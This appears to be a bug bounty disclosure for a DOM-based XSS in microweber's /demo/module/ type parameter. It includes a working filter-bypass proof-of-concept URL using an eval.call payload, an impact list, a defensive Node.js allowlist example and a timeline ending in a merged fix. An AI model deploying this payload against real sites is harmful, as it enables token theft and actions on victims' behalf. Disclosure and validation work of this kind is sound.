Cross-site scripting - DOM in microweber/microweber

Valid

Reported on

Jul 7th 2022


Description

DOM-based XSS with a filter bypass on /demo/module/ via the type parameter, exploitable without authentication.

Proof of Concept

https://demo.microweber.org/demo/module/?type=files/xss%27;eval.call`${%27alert\x28window.origin\x29%27}`;//&live_edit=true&remeber_path=true&ui=basic&start_path=media_host_base&from_admin=true&file_types=images&id=mw_admin_pictures_upload_browse_existing_modaledit-post-gallery-main&from_url=http://google.com/

PoC Image

[screenshot]

Impact

The attacker can:

  • Steal tokens to perform CSRF.
  • Fetch contents from same-site pages.
  • Redirect the user. ...
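As an added example (not microweber's code), the Node.js snippet below decodes the type parameter from the PoC URL above and shows why an allowlist check stops the payload while a naive parenthesis denylist does not; the function names, the allowlist pattern and the shape of the denylist are assumptions.

```javascript
// Added example, not microweber's code: validating the "type" query value
// of /demo/module/ with an allowlist, contrasted with a parenthesis denylist
// that the report's PoC payload slips past.
// Function names, the allowlist pattern and the denylist are assumptions.

// The PoC URL from the report (trimmed to the relevant parameters); the
// backslashes are doubled only so the JS string holds a literal "\x28".
const POC_URL =
  "https://demo.microweber.org/demo/module/?type=files/xss%27;eval.call`" +
  "${%27alert\\x28window.origin\\x29%27}`;//&live_edit=true";

// Percent-decode the "type" parameter the way a browser-side script would.
function getTypeParam(url) {
  return new URL(url).searchParams.get("type");
}

// Denylist the way a naive filter might do it: refuse literal parentheses.
// The PoC contains none (it carries \x28/\x29 escapes inside a string that
// is only turned into "(" and ")" when eval'd), so this check lets it pass.
function passesParenDenylist(value) {
  return !/[()]/.test(value);
}

// Allowlist: a module type is one or more lowercase alphanumeric path
// segments such as "files" or "files/admin". Anything else is rejected
// before it can reach a script or HTML context.
const MODULE_TYPE_RE = /^[a-z0-9_]+(?:\/[a-z0-9_]+)*$/;
function isValidModuleType(value) {
  return typeof value === "string" && MODULE_TYPE_RE.test(value);
}

// Audit a URL: return the decoded value and what each check decides.
function auditTypeParam(url) {
  const value = getTypeParam(url);
  return {
    value,
    denylistAllows: value !== null && passesParenDenylist(value),
    allowlistAllows: isValidModuleType(value),
  };
}

console.log(auditTypeParam(POC_URL));
// denylistAllows: true, allowlistAllows: false
console.log(auditTypeParam("https://example.test/demo/module/?type=files"));
// denylistAllows: true, allowlistAllows: true
```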
Timeline

  • We are processing your report and will contact the microweber team within 24 hours. (a month ago)
  • Nhien.IT modified the report (three times, a month ago)
  • We have contacted a member of the microweber team and are waiting to hear back. (a month ago)
  • Peter Ivanov validated this vulnerability. (a month ago)
  • Nhien.IT has been awarded the disclosure bounty.
  • The fix bounty is now up for grabs.
  • The researcher's credibility has increased: +7
  • Peter Ivanov confirmed that a fix has been merged on 79c691. (a month ago)
  • Peter Ivanov has been awarded the fix bounty.